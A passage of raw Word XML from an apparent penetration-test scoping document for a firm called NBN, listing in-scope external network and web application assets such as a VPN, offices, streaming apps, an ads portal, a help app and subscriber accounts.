      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>External Network Pentest</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="3DB9E75D" w14:textId="15D51593" w:rsidR="00FD4229" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>In Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA96A6A" w14:textId="726DDA97" w:rsidR="00FD4229" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The assessment team will enumerate all external-facing hosts and services. After performing enumeration, the team will verify the discovered scope with the NBN security team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D25BC3F" w14:textId="53CF2477" w:rsidR="00FD4229" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">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1705"/>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="5665"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="60ED69DB" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EA37C5E" w14:textId="703CE70C" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="619EF8F4" w14:textId="523C4EAF" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
              <w:t>IP Address/URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AC19E94" w14:textId="65265871" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005264D0" w:rsidRPr="005264D0" w14:paraId="2E4ACD7E" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CA23984" w14:textId="59FD30B5" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>NBN VPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F02EB73" w14:textId="10E71877" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Not Provided</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E0F5C09" w14:textId="3E5F4580" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Vendor-hosted VPN for NBN employees.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="744B3729" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="000000010000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="1" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00A2467D" w14:textId="6A9EE5E4" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Physical Office</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66412D75" w14:textId="46853DD7" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D79CA1A" w14:textId="38A142BF" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>NBN Office locations</w:t>
            </w:r>
            <w:r w:rsidR="007E1592" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="206D0D11" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRDefault="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="215D6A" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc129370244"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55301E07" w14:textId="4E7CAFB2" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00663942">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>External Web Application Pentest</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="31FCCA5C" w14:textId="77777777" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00663942">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>In Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EC00C4" w14:textId="7B668D4A" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00663942">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The assessment team will enumerate all external-facing web applications. After performing enumeration, the team will verify the discovered scope with the NBN security team.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1975"/>
        <w:gridCol w:w="1710"/>
        <w:gridCol w:w="5665"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="2D9043E5" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1975" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="080AC0D5" w14:textId="6DB92007" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52BB6F08" w14:textId="1D1D4C74" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
              <w:t>IP Address/URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B9F691C" w14:textId="77777777" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="1726E5A6" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1975" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18139FBC" w14:textId="3DE16C91" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>NBN TVee Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12897140" w14:textId="1F9451D2" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Not Provided</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DCA5B8C" w14:textId="2557E963" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Media streaming application web version</w:t>
            </w:r>
            <w:r w:rsidR="007E1592" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="5A6AABDC" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="000000010000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="1" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1975" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4083812C" w14:textId="6682CD64" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00663942">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>NBN TVee Mobile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FFF5C50" w14:textId="7DC9F2BB"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52852F0B" w14:textId="12AD81C4" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00663942">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Media streaming application mobile version</w:t>
            </w:r>
            <w:r w:rsidR="007E1592" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="3BC1CFB7" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1975" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FEBB84C" w14:textId="108C929F" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00663942">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>NBN Ads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="710A35F7" w14:textId="45307DCF"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2FC53653" w14:textId="6A830991" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00663942">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Business partner advertisement web application.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="32DF260C" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="000000010000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="1" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1975" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59295382" w14:textId="426A4B28" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00663942">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>NBN Help</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2175958B" w14:textId="478F7E6E"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36F6BDE1" w14:textId="70E81654" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00663942">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Support app for subscriber and business partner accounts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28474F56" w14:textId="77777777" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00663942" w:rsidP="00663942">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE634C5" w14:textId="77777777" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00663942">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2396"/>
        <w:gridCol w:w="2804"/>
        <w:gridCol w:w="4150"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="7452F520" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61A8BC28" w14:textId="57E09838" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2804" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0383540B" w14:textId="286FBCBF" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>IP Address/URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4150" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="603BE1D1" w14:textId="77777777" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="0B6378C2" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45F12CA5" w14:textId="23F67994" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>NBN Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2804" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D92C38A" w14:textId="768F336D" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4150" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="726442CC" w14:textId="19DC40D5" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Existing NBN subscribers (SUB) and Business Partners (BP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="573CDE7C" w14:textId="77777777" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00663942" w:rsidP="00FD4229">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
